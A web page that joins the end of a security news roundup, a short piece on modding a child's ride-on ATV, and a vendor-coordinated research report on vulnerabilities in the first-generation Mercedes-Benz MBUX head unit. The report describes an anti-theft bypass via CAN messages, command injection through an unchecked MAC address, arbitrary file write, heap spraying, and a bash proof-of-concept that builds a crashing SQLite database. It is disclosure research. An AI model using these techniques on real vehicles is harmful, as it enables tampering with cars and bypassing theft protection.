And if compromising Windows 11 is of interest to you, HN Security has just wrapped a four-part series that covers finding a vulnerability in an old Windows kernel driver, and turning it into a real read/write exploit that bypasses all of Microsoft’s modern security hardening.
Do you have a website, and are you interested in how your API is getting probed? Want to mess with attackers a bit? You might be interested in the new baitroute tool. Put simply, it’s a honeypot for web APIs.
And finally, the minds behind Top10VPN have released another vulnerability, this time in tunneling protocols like IPIP, GRE, and 6in4. The problem is a lack of validation on incoming tunnel packets. This allows for easy traffic injection, and using the tunnel servers as easy proxies. One of the worst cases is where this flaw allows accessing an internal network protected behind a consumer router.
Modding a Toddler’s Ride-On For More Grunt
Kids love their Power Wheels and other ride-on electric cars. Indeed, [Ashwin]’s son was digging his little ATV, but soon found that some care was needed on the pedal. It had no proper throttle control, instead turning the motor hard on or off and scaring the poor kid in the process. The solution? A bit of an upgrade from some off-the-shelf electronics.
Inspiration came from—where else—the /r/PowerWheelsMods subreddit. The main tweak was to install an off-the-shelf soft-start circuit to stop the motor banging hard on when the accelerator was pushed. Instead, when the accelerator is pushed, the module gradually ramps up its PWM output to the motor to smooth out the acceleration curve. This would make the ATV much easier to ride.
Implementing this off-the-shelf solution did take some doing, though. The first attempt ended with a short circuit and a blown fuse. However, [Ashwin] wasn’t deterred—a trip back online to do some research did the trick. With some careful wiring that took into account the crude forward and reverse circuit, [Ashwin] had a much smoother running ride-on for his son.
While most of the mods we see for these little ride-ons are all about power and speed, we do appreciate the occasional attempt to make the things a bit safer for younger drivers. If you’re brewing up your own fancy kidmobile at home—don’t hesitate to let us know!
Mercedes-Benz Head Unit security research report
Introduction
This report covers the research of the Mercedes-Benz Head Unit, which was made by our team. Mercedes-Benz’s latest Head Unit (infotainment system) is called Mercedes-Benz User Experience (MBUX). We performed analysis of the first generation MBUX.
MBUX was previously analysed by KeenLab. Their report is a good starting point for diving deep into the MBUX internals and understanding the architecture of the system.
In our research we performed detailed analysis of the first generation MBUX subsystems, which are overlooked in the KeenLab research: diagnostics (CAN, UDS, etc.), connections via USB and custom IPC.
This article would not have been possible without the amazing work of Radu Motspan, Kirill Nesterov, Mikhail Evdokimov, Polina Smirnova and Georgy Kiguradze, who conducted the research, discovered the vulnerabilities, and laid the groundwork for this report.
Special thanks to Mercedes-Benz Group AG for their professionalism and prompt handling of all the identified vulnerabilities.
Diagnostic software
To get a first look at the vehicle architecture, it is helpful to use diagnostic software (which is available to certified users only) to scan the Electronic Control Unit (ECU), identify its version, and test the software’s diagnostic functionality. There are several diagnostic tools which make it possible to connect to the vehicle, using various types of communication. In our research, we used a combination of diagnostic tools: a certain hardware interface and a corresponding software application to communicate with the vehicle through the hardware device. This setup allowed us to establish communication over DoIP (Diagnostic Over Internet Protocol):
Communication between diagnostic software and hardware
The TCP communication between the diagnostic tool and the diagnostic hardware device is performed over Ethernet using custom protocols (Protocol Data Unit, PDU). At the first stage, the diagnostic hardware device uses a custom ASCII-based protocol (CSD). It performs user authentication, version check, configuration setup, and provides the initial environment to process the upper layer protocol (PDU).
The upper layer protocol has a binary format. It is used to send Universal Diagnostic Services (UDS) messages, trigger DoIP communication, and so on. To analyze this protocol, we used a script written in LUA:
[pduparser.lua]. Using this script, UDS commands can be easily distinguished from the regular network traffic of communication between the diagnostic software and hardware:
We examined the diagnostic tool interface and decoded the traffic, which allowed us to find various UDS commands, such as for resetting the ECU, turning off the engine, and locking the doors.
Architecture
The architecture of MBUX is as follows:
The main parts of MBUX are:
- MMB (Multi Media Board) — the main part of the head unit (HU) which contains all the subsystems;
- BB (Base Board) — the part with chips for various network communications;
- CSB (Country Specific Board) — the extended part which communicates with the MMB through internal Ethernet;
- RH850 — the module designed to provide communication between low level buses.
Full information on the MBUX architecture can be found in the KeenLab research.
Test setups
For our research we used two test setups:
- a real car — Mercedes B180;
- a testbed — our own platform for hardware and software testing, which we designed for the purpose of this study.
Anti-Theft
While modeling the testbed, we needed to bypass the original anti-theft feature, because after the actual vehicle is started up, the head unit waits for authentication over the CAN bus. As mentioned in the KeenLab research, specific commands should be sent over CAN to wake up the system. We couldn’t imitate this in our setup, so the head unit was entering anti-theft mode and the user couldn’t communicate with it. Taking an empirical approach, we discovered that some CAN messages force the head unit to reset the anti-theft status. In fact, these messages trigger the anti-theft check. For example, when the head unit tries to turn off the display, the CAN message initiates the anti-theft check, leaving the head unit still accessible for a few seconds. For seamless and stable investigation, we created a script that continuously sent this message in a loop.
As a result, the head unit becomes accessible for a long time, switching between an authenticated state and anti-theft mode.
Firmware
The MMB runs on Linux, and its filesystems are located on the eMMC. We needed to extract the eMMC from the printed circuit board by unsoldering it. Inside, there are several partitions:
MMB files can also be downloaded from a diagnostic tool website that provides updates for specific hardware part numbers.
Unpack update
Nowadays multimedia systems in cars are generally updated over-the-air. Car dealerships are one exception, however, as they can perform offline software updates with the diagnostic tool.
Several outdated update files can still be found online. Update file types can be divided into the following groups by their names:
- files with \*ALL\*, containing *.CFF, *.SMR-F and *.bin files;
- files with \*CFF\*, containing only *.CFF files;
- files with \*SMR-F\*, containing only *.SMR-F files.
In general, *.bin files are containers with a custom file structure. They can be encoded with zlib or other methods.
*.SMR-F files are compressed and they also have a custom file structure. Besides metadata in plaintext, they also contain encrypted data, which the diagnostic tool uses its shared libraries to decrypt. After decryption, the resulting file contains the metadata and a container, just like the *.bin files.
*.CFF files contain the same payload content as the *.SMR-F files, but uncompressed. This format was used for earlier head unit generations.
Custom IPC
Inside the head unit, firmware services use custom IPC protocols for communication between their own threads, other services and other ECUs. There are three main widely used protocols:
- thriftme;
- MoCCA;
- GCF.
These protocols can be used at the same time; moreover, each service can use all of them simultaneously. Knowing the internals and API of these protocols, it’s easier to understand the workflow of the services.
thriftme
This RPC protocol is based on the open-source protocol Apache Thrift. Its main distinctive feature is that thriftme allows subscribers to be notified about particular events. The UNIX socket, TCP, UDP, SSL, and so on can be used as a transport for this protocol. The core functionality of this protocol is implemented in the library libthriftme.so.2.7.2.
The base class in the thriftme RPC is “thrift::TServiceBroker”, which isolates the communication with transports and call interfaces of services and clients. In thriftme, the service broker version is the instance of “thrift::lisa::CTLisaServiceBroker”, which inherits from “thrift::TServiceBroker”.
Services in thriftme are inherited from “thrift::lisa::TLisaServerBase” (which, in turn, inherits from “thrift::TServiceProcessor”). Services are registered in the service broker through “thrift::TServiceProcessor::registerService”. Transport used by clients is registered through “thrift::lisa::CTLisaServiceBroker::addServers” (which wraps “thrift::TServiceBroker::addServer”). Service interface functions are registered through “thrift::TServiceProcessor::tmRegisterCallback”. The handler is passed to this export function in arguments, and it is called while processing the client request. So the instance of the service in memory looks as follows:
The “interface1” field contains functions which process the API of the service and their wrappers previously registered through “thrift::TServiceProcessor::tmRegisterCallback”. The “interface2” field contains functions which are called to notify subscribers of this service.
Clients in thriftme are inherited from “thrift::lisa::TLisaClientBase” (which, in turn, inherits from “thrift::TClient”). In fact, client instances are created by the service broker when the transport is successfully created. In our case, the service broker used the factory of a client, which is registered in the service broker through “thrift::TServiceBroker::tmRegCli”. The factory helps clients register handlers for notification about events through “thrift::TClient::tmRegisterCallback”. The sample instance layout of a thriftme client is the following:
The “interface1” field contains the handler is called after transport connection. Usually this handler is used to trigger a subscribe operation to receive event notifications. The “interface2” field contains functions which send requests to the service API. The “interface3” field contains functions which are called before initiating the “notify subscribers” operation of this service. Their wrappers were previously registered through “thrift::TClient::tmRegisterCallback”.
MoCCA
This RPC framework was developed by Harman and is based on the open-source DSI framework. The core functionality is implemented in the “/opt/sys/lib/libSysMoCCAFrameworkSharedSo.so.11” library. This framework is widely used for interthread communication.
During start-up, the service creates component instances through factory functions, for example “CHBApplicationBuilder::theCDiagnosisComponentCreator”. This instance inherits from the class “CHBComponent”. The global variable “CHBComponentInfo::spMap” contains the mapping between additional information about components and their names. The framework allows components to have their own aliases to access another components through “CHBComponentInfo::addComponentMapping”: “CHBComponentInfo::addComponentMapping(&unk_581498, “FsActionHandler”, “FilesystemMainActionHandler”)”. Components can contain multiple services and clients and can communicate with their own services or other component services. The following is the architecture of components:
For communication the following events are used:
An example of a client object is “CTraceServiceClientBase”, which inherits from “CHBClientBase” and uses the proxy object “CTraceServiceProxy” for transport. The proxy object inherits from “CHBProxyBase” and is created through the factory method “CTraceServiceProxy::findOrCreateInstance”. It tries to reuse already created proxy objects inside this component. The general layout of a client object is as follows:
The “IHBEventConsumer” interface is used to process response events in “CTraceServiceClientBase”. The entry point for processing is the “processEvent” method. It uses two values to find a handler, which are called as follows:
- use the “status” field to identify the response: standard response of a service, failed or invalid response;
- use the “internalID” field to identify the API function.
On the service side in our example we used the “CTraceServiceStub” class. Below is its layout:
The request event is processed in the “processEvent” method. It identifies the API function handler using the “internalID” field and calls the identified handler.
GCF
GCF is a custom protocol, which is used for RPC. It allows the services to be registered in the router. The router handles the following messages from services and clients:
- Control message (“CTRL”):
- “REGS” – used to register service;
- “REGF” – used to register RPC function of service;
- “EVNT” – used by service to notify clients about event;
- “CALL” – used by clients to call functionality of service;
- etc.
So during initialization, the services are registered in the router. The internal router table handles the flow of message processing. Finally, clients can send call requests to the router, which trigger predefined functions of registered services. The format of a call request is as follows:
CALL <ServiceName>:<Number> <ServiceCallName> <Params>
Internal network
As mentioned in the KeenLab research, there are some test points on the head unit, which are used by the CSB for connection to the MMB. We removed the default connection and connected the RJ45 cable to access the internal network of the head unit. This connection, labelled as
eth0, has some restrictions, as stated in the corresponding firewall rules in “firewall_prd.policy”:-A INPUT -s [IP]/32 -d [IP]/32 -i eth0 -m state –state NEW -j ACCEPT
-A OUTPUT -s [IP]/32 -d [IP]/32 -o eth0 -j ACCEPT
-A OUTPUT -s [IP]/32 -d [IP]/32 -o eth0 -m state –state NEW -j ACCEPT
Access to services on the MMB is established via an IP address, which is a default address for connecting the CSB to the MMB. The scan results of TCP ports on the MMB are as follows:
After connecting to the test point, we received a huge attack surface and access to the Diagnostic Log and Trace (DLT) subsystem, which is very helpful when testing and debugging:
DLT supports callback injection, which makes it possible to call specific handlers inside services. In the head unit this feature is widely used for product testing.
Identified vulnerabilities
The following findings were used to compromise the testbed. It is necessary for debugging the environment and searching for vulnerabilities in the subsystem that can be exploited in the real car.
CVE-2024-37600 (MoCCA)
The “servicebroker” service is a part of a DSI framework, which is used in MoCCA. This service is used to monitor services and clients.
It sets up HTTP servers using TCP ports. There are several POST commands, which can be processed. One of them is
disconnect, which takes a string as an argument.
The code in the
setup() function tries to parse this command with functions that provide unnecessarily excessive access to memory. According to the disassembled code, it performs read operations using sscanf on a stack buffer. As a result, there can be a stack buffer overflow:
In DLT logs we can identify crashes:
CVE-2023-34404 (GCF)
“MonitorService” is a service which can be accessed over GCF protocol. This service is initialized and started in the “scp” service. The latter, in turn, is a systemd service, which starts with the following configuration:
...
[Service]ExecStart=/opt/comm/swmp/wicome/bin/scp -f /var/opt/swmp/pss_config.cfg -s
wicome_config -r /opt/comm/swmp/wicome/bin -k VerboseLevel=5
ExecStop=/bin/kill $MAINPID
Environment=LD_LIBRARY_PATH=/opt/sys/lib:/opt/comm/swmp/wicome/lib
Environment=LOGNAME=root
EnvironmentFile=/opt/etc/lisa_env
Type=simple
Restart=on-failure
RestartSec=2
WatchdogSec=240
...
“MonitorService” uses the following configuration file “/var/opt/swmp/pss_config.cfg” to fine-tune its operation:
MonitorService.TimestampEnable = 1
MonitorService.ReceiveEnable = 1
MonitorService.MonitoringEnable = 1
MonitorService.MessageBufferSize = 1000
MonitorService.MessageBufferMemory = 512000
#1-file, 2-dlt, 3-both
MonitorService.LogMode = 2
#MonitorService.LogMode = 0
MonitorService.LogFileSize = -1
MonitorService.LogFileName = /tmp/wicom.log
MonitorService.LinefeedEnable = 1
MonitorService.HeaderEnable = 1
MonitorService.FileHeaderEnable = 1
#RH
MonitorService.Port = 2021
The “MonitorService.Port” variable handles the number of the TCP port that will be used by the server. The “MonitorService.ReceiveEnable” variable defines whether the server is able to handle requests from clients. Accordingly, “MonitorService”, containing the head unit configuration, can receive GCF messages from the client and transfer them through the GCF router.
The list of registered services in the GCF router includes “NetworkingService”. It has the following registered handlers:
The “NWS_PF_setMacAddrExceptionIP” handler adds rules to the firewall policy. It uses the following arguments:
- macAddress – MAC address for the rule;
- direction – defines the direction of rule: inbound or outbound;
- fate – defines the type of rule: allow or deny;
- command – the action to be performed: add the rule or remove it from the policy.
The control flow for processing this request is located in the following binaries: “MonitorService”, “libwicome_monitorservice.so” and “libwicode_gcf_core.so”. The call stack is the following:
sub_EE6E8 (NWS_PF_setMacAddrExceptionIP)
sub_E9D0C (sNWS_PF_setMacAddrExceptionIP)
sub_F275C (CGCFStub_PF::setMacAddrExceptionIP)
sub_F7AF4 (CGCFStub_PF::_int_setMacAddrExceptionIP)
snprintf
sub_F7EB4 (systemExec)
system
The
sub_F7AF4 function executes the system() call with arguments to the iptables binary:/* ... */
if ( v10 )
{
v11 = (const char *)PAL::CString::raw(direction);
v12 = (const char *)PAL::CString::raw(mac);
if ( snprintf(v22, 0xFFuLL, "iptables -%s %s -m mac --mac-source %s -j
%s ", (const char *)&v21, v11, v12, v20) < 0 )
{
/* ... */
v18 = 0;
}
if ( v18 )
{
if ( (unsigned __int8)systemExec(a1, v22) != 1 )
{
/* ... */
return 0;
}
}
}
/* ... */
When processing the request, the MAC address is neither checked nor restricted. That means an attacker can perform command injection during the
iptables command execution.
Privilege escalation
The head unit uses the outdated system Polkit, which is vulnerable to CVE-2021-4034. This is a local privilege escalation vulnerability that can result in unprivileged users gaining administrative rights on the target machine. There are a lot of publicly available exploits targeting it, enabling the execution of arbitrary commands as the user “phone” of group “comm”.
After successfully exploiting this vulnerability, an attacker can run commands to modify network interfaces, mount filesystems, and perform other privileged activities. Although some restrictions are imposed, a potential attacker can access the systemd command to further escalate their privileges.
The partition with root filesystem was mounted as a read-only filesystem. As mentioned in the KeenLab research, the head unit doesn’t have any enabled disk integrity protection features. That means the filesystem can be remounted with read and write rights, and the bash scripts that are run during start-up can be modified.
USB
USB is the most popular attack vector in terms of physical access. The head unit is built on a microservice architecture, where each service is rather isolated and communicates through an API. Each microservice of the head unit provides some internal functionality and one or more thriftme services, through which other microservices can communicate with it. This fact enables the emulation of a USB subsystem using QEMU user-mode version.
Preparation
The “DeviceManager” service is responsible for handling USB events: adding, removing, mounting or updating. Other services can subscribe to “DeviceManager” and use notify callbacks to perform actions when USB events occur. For example, such a service can start searching for specific files when the USB filesystem is mounted.
The “GDVariantCodingService” service is a frontend of variant coding. Other services use it to identify the parameters of the head unit and car.
Both of these services should be emulated to run a self-hosted USB subsystem. This task can be performed by emulating corresponding thriftme services. So, for successful emulation, we should perform the following actions:
- Prepare the network for IP addresses used by services.
- The services “DeviceManager” and “GDVariantCodingService” use UNIX sockets for transport. To emulate them, it’s easier to use TCP sockets so that we aren’t dependent on the filesystem. Perform forwarding using socat.
- Run the emulated thriftme services. In our case, we created devicemgr.py, vehicle.py and varcoding.py. In devicemgr.py, the mounting of the USB filesystem is emulated to the path “/opt/sys/bin/aaaaa”.
- Use QEMU user emulation in a “transparent” fashion.
- In the chroot environment prepare folders and devices.
The USB subsystem is emulated.
Emulation of data export, import and tracing
The head unit has the functionality to import or export user profile files (seat position, favorite radio stations, etc.) to or from a USB storage. This task is handled by the “UserData” service — to be more precisely, by the thriftme service “CSystemProfileServiceImpl”.
The user profiles backup looks like a folder with the following directory structure:
.
└── MyMercedesBackup
├── shared
├── system
│ ├── rse.ud2
│ └── system.ud2
└── udxprofiles
├── profile0
│ ├── commuterroute.ud2
│ ├── emotions.ud2
│ ├── navidata.ud2
│ ├── pud.ud2
│ ├── uapreds.ud2
│ ├── vt_ab.ud2
│ └── vt_tuner.ud2
└── profileindex.xml
Some of the files are generated by “UserData” itself, but most of them are generated and processed by other services, like “CAPServer”. The most important component of data import and export processes is the thriftme service “UserDataExchangeService” in “UserData”. Services subscribe for notifications about data import and export in UserDataExchangeService.
“CSystemProfileServiceImpl” performs the following workflow when exporting the profiles backup:
- Run timer for 100 seconds.
- Notify client services through “UserDataExchangeService” using events that request data export. Such events contain the information about the exported data.
- Services call API functions that verify the success of the data export. Their arguments are a data key and a path to the file.
- “UserData” collects all received files, encodes them and stores them in the mounted USB filesystem.
The scheme is similar for the profile backup import:
- “UserData” copies files from the USB to the local system and decodes them.
- It notifies client services through events that request data import.
- If the client service is handling the data key, it imports the data.
- Services call API functions that verify the success of the data import.
The backup contains XML files and binary files. Binary files are considered more useful for vulnerability hunting:
| Data key | Filename in backup | Content |
| PUD_COMMUTER | commuterroute.ud2 | ISO-8859 text, with no line terminators |
| PUD_UAPREDICTIONSDATA | uapreds.ud2 | SQLite 3.x database |
| PUD_VT_TUNER | vt_ab.ud2 | Proprietary binary data |
| PUD_VT_ADDRESSBOOK | vt_tuner.ud2 | Proprietary binary data |
When triggering backup import (restore) and export (backup), the following scripts were created:
triggerRestore.py and triggerBackup.py.
Almost all the services of the head unit support the trace system
HBTracePersistence, which allows tracing to be turned on and off for a specific module or function.
The “hbtc” file contains the tracing system configuration and determines the function tracing method. An example of the “hbtc” file is provided below:
HBTracePersistence 1.0.0
imp 00 08
imp_userdata_private_CSystemProfileManager ff 08
imp_userdata_private_CUserDataVehicleInformationAdapter ff 08
imp_userdata_private_CUserDataIF2Impl ff 08
imp_common_streamhelper_StreamHelper ff 08
imp_userdata_private_CUDXStructure ff 08
As mentioned previously, files in the backup are encoded — the algorithm is proprietary. The “CPUserDataEncodingHandler” class handles it. The script
ud2codec.py was prepared to be able to encode and decode files.
Identified vulnerabilities
The following vulnerabilities were tested on a real car.
CVE-2024-37601
The process of decoding files with the
*.ud2 extension contains the heap buffer overflow vulnerability.
“UserData” represents encoded data through the “CHBString” object, which processes data as a UTF string. Then the UD2-specific decoding characters should be deleted, and their indexes should remain constant. For this task we used the “CHBString::const_iterator::incrementSteps” function to get the pointer on the desired character and “CHBString::remove” to remove the character from the string. “CHBString::const_iterator::incrementSteps” incorrectly processes the character with code
0xe7: it will be decoded as 1 byte. But according to the table “UTF8LookUpTable”, which is used in “CHBString::remove” and “CHBString::CHBString”, the character with code 0xe7 is encoded with 3 bytes.
As a result, when performing the “CHBString::remove” function, the calculated pointer can be outside of the allocated buffer after UTF decoding with “UTF8LookUpTable”. The memmove function will be called with the third argument (size of buffer) equal to -1.
Without further exploitation by the attacker, this vulnerability triggers the crash of the “UserData” service during data import. This puts the system into a frozen state, which can be fixed only through an ECU hard reset.
CVE-2023-34402
As mentioned previously, the
vt_ab.ud2 file was decoded as vt_ab.xml during the profile backup export for vulnerability searching. This file’s contents resemble a binary and it is processed by the text-to-speech service.
The
vt_ab.xml file contains another file, describing which service will be dropped during processing. For this task it contains the name of the file to drop. This action is performed in the “UserDataExchangeServiceClient::unpackVoiceTagArchiveOptimized” function:
- get the content of the file describing what to drop;
- get the name of the file to drop and perform the dropping.
Because the checks are not being performed, an attacker can control the path which is used to write controllable content. As a result, the attacker can access arbitrary file writing with the same rights the service has.
CVE-2023-34399
After decoding, the
uapreds.ud2 file in the profile folder “MyMercedesBackup/udxprofiles/profile0” takes the form of uapreds.db. The system recognizes it as an SQLite database, which is parsed in the service that uses machine learning for creating efficient routes. The decoded file is processed in “capthrift::CapServer::requestImportBinaryData”, then it calls “capthrift::CapServer::setProfile” to load the database.
All values in the SQLite database tables are serialized as an archive to match the boost library. The format of this archive can be either XML or plain text. We used the plain text mode. Here is an example of an archive in the
learning_kernel row of the kvpair_table table:22 serialization::archive 11 0 2 0 1 0 0 1 0 1 0 0 0 0 1
0.00000000000000000e+00 0 0 0 0 0 0 0 0 1.00000000000000000e+00
...
The last publicly available version of the boost library, 1.81 (at the time of research), contains the integer overflow vulnerability. This vulnerability can be exploited when processing an entity pointer:
In (1), the value
cid was obtained from the attacker-controllable data. After that, in (2), this value is used as an array index to get the cobject_id object. (3.1) and (3.2) introduce restrictions for cid:
- whether the value of cid equals -1;
- whether the value of cid is greater than the size of the cobject_id_vector array.
These restrictions can be bypassed using the assigned value of
cid. This is possible because the definition of class_id_type is assigned an integer:
So if we assign the “–3” value to
cid, then the pointer co.bpis_ptr (2) will be corrupted.
Lastly, the triggered vulnerability in the debugger looks as follows:
Thread 63 hit Breakpoint 2, 0x0000004002f3cea4 in ?? ()
# cid value
(gdb) i r x2
x2 0xfffffffffffffffd -3
# cobject_id_vector size
(gdb) x/1hx $x20 + 0x58
0x405c01b278: 0x000e
# cobject_id_vector pointer
(gdb) x/1gx $x20 + 0x60
0x405c01b280: 0x000000405c017f00
# 1 element in the cobject_id_vector
(gdb) x/3gx *(void **)($x20 + 0x60) + 0 * 0x18
0x405c017f00: 0x000000400147f1c8 0x0000000000000000
0x405c017f10: 0x0000010000000002
# refferenced element
(gdb) x/3gx *(void **)($x20 + 0x60) + -3 * 0x18
0x405c017eb8: 0x5f72696170766b5f 0x00315f656c626174
0x405c017ec8: 0x0000000000000035
(gdb) c
Continuing.
Thread 63 received signal SIGSEGV, Segmentation fault.
Exploitation notes
At the first stage, it is assumed that the image base address is fixed and the vulnerability code is loaded to a specific address in the memory. We analyzed the vulnerability code and checked exactly how all the pointers are dereferenced and where the virtual call is performed. Here are the steps:
- By controlling the id, we can move the pointer (by moving it to negative offsets relative to the beginning of the array in the heap);
- By moving the pointer, we will get to an address where another address containing an object for bis_ptr is located;
- The address for bis_ptr should contain the address of the virtual call table.
Controlling only the offset to the corresponding object, we need to get to the address in the heap which contains a pointer to the pointer with the associated virtual table.
We can implement such a scenario using a spray of DDL entries inside the SQLite database that we can control. For such a spray, we need to create a lot of tables with long names. As a result, structures of a proper format will appear in the heap and a negative index will allow us to get to these structures.
Below is an example of such a SQLite-based file (the entry in
sqlite_schema is a table creation request):
So we can create a lot of tables with long names, which gives us a heap spraying primitive.
Using the heap spraying technique, an attacker can fully control the execution:
To import the
uapreds.db database to the “CAPServer” service, we need to copy it to the service’s working directory. Then “CAPServer” tries to load the database from its own working directory. As a result, if an attacker managed to import the database which triggers the vulnerability in the head unit, then each start-up of “CAPServer” will try to load it and crash. The “CAPServer” service gets started by “systemd” and is configured as follows:
[Service]ExecStart=/opt/prediction/bin/CAPServer /var/opt/prediction/
ExecStop=/bin/kill $MAINPID
Environment=LD_LIBRARY_PATH=/opt/sys/lib
EnvironmentFile=/opt/etc/lisa_env
Type=notify
WatchdogSec=30
Restart=on-failure
RestartSec=2
This means that after the crash, “systemd” will try to restart “CAPServer”. This triggers an infinite loop of service crashes, which can be helpful when trying to brute force the image base address.
Inside SQLite database, there is a pragma section which contains SQL commands to create tables. This feature can be used to create controllable data out of tables in the database based on the current time. The following script can be used to automate the process of creating an SQLite database, which might trigger this vulnerability according to the current time:
#!/bin/bash
DBPATH=test.db
STOP_TIME=$(date --date='-2 hours +10 seconds' +"%H:%M:%S")
echo "Trigger until < $STOP_TIME, clean after >= $STOP_TIME";
poc_value="CRASH the system"
clean_value="system work"
check() {
sqlite3 $DBPATH << EOF
SELECT strftime ('Time of database: %H:%M:%S', 'now');
select * from target_table;
.exit
EOF
}
rm $DBPATH
sqlite3 $DBPATH << EOF
CREATE VIEW target_table AS SELECT "key" AS varkey, "$poc_value" AS varval
WHERE TIME() < "$STOP_TIME" UNION SELECT "key" AS varkey, "$clean_value" AS
varval WHERE TIME() >= "$STOP_TIME";
.exit
EOF
check
sleep 10
check
As a result, an attacker can run image base address brute forcing for some time.
Attack vectors
During our research, we managed to compromise the testbed of the head unit and found several vulnerabilities for a real car via physical access.
The testbed compromise has three potential use cases:
- a criminal wanting to disable the anti-theft protection in a stolen head unit;
- a car owner tuning and unlocking prepaid services on their vehicle;
- a pentester conducting research to find new vulnerabilities.
In the case of a real car, the identified vulnerabilities can be triggered through an exposed USB service that is available to the general user.
Vulnerability list
During the process of vulnerability disclosure with the vendor, the following CVE IDs were assigned:
CVE-2024-37602
CVE-2024-37600
CVE-2024-37603
CVE-2024-37601
CVE-2023-34406
CVE-2023-34397
CVE-2023-34398
CVE-2023-34399
CVE-2023-34400
CVE-2023-34401
CVE-2023-34402
CVE-2023-34403
CVE-2023-34404
The CVE details will be published here: github.com/klsecservices/Advis….
securelist.com/mercedes-benz-h…
